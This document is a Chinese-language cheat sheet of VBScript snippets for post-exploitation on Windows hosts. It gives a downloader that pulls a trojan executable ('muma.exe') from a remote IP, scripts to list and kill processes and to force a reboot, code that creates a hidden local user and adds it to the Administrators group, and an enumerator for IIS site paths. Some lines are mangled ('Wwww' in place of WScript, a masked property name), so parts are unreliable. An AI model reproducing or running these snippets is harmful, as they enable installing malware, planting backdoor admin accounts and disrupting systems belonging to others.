渗透常用vbs脚本

1.文件下载(无回显)
echo iLocal = LCase(Wwww.Arguments(1)) >iget.vbe
echo iRemote = LCase(Wwww.Arguments(0)) >>iget.vbe
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe
echo xPost.Open "GET",iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe

用法: cscript 0x007.vbs http://111.111.111.111/muma.exe muma.exe

2.列举进程
@echo for each ps in getobject _ >ps.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs
@echo wwww.echo ps.handle^&vbtab^&ps.name^&vbtab^&p*.**ecutablepath:next >>ps.vbs
用法:cscript 0x007.vbs.vbs

3.终止进程
@echo for each ps in getobject _ >pskill.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pskill.vbs
@echo if ps.handle=wwww.arguments(0) then wwww.echo ps.terminate:end if:next >>pskill.vbs

用法: cscript 0x007.vbs pid

4.重启系统
@echo for each os in getobject _ >reboot.vbs
@echo ("winmgmts:!\\.\root\cimv2:win32_operatingsystem").instances_ >>reboot.vbs
@echo os.win32shutdown(2):next >>reboot.vbs

5.添加用户

Set a=CreateObject("Shell.Users")

Set z=a.create("oo")

z.changePassword "xx",""

z.setting("AccountType")=3

或者

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)    '得到adsi接口,绑定
Set oe=GetObject(os&"/Administrators,group") '属性,admin组
Set od=ob.Create("user","lcx") '建立用户
od.SetPassword "123456"      '设置密码
od.SetInfo                '保存
Set of=GetObject(os&"/lcx",user) '得到用户
oe.add    os&"/lcx"

6.用vbs来列虚拟主机的物理目录

Set ObjService=GetObject("IIS://LocalHost/W3SVC")  
For Each obj3w In objservice  
If IsNumeric(obj3w.Name) Then  
sServerName=Obj3w.ServerComment  
Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")  
ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf  
End If  
Next  
WScript.Echo ListAllWeb  
Set ObjService=Nothing  
WScript.Quit

用法: cscript 0x007.vbs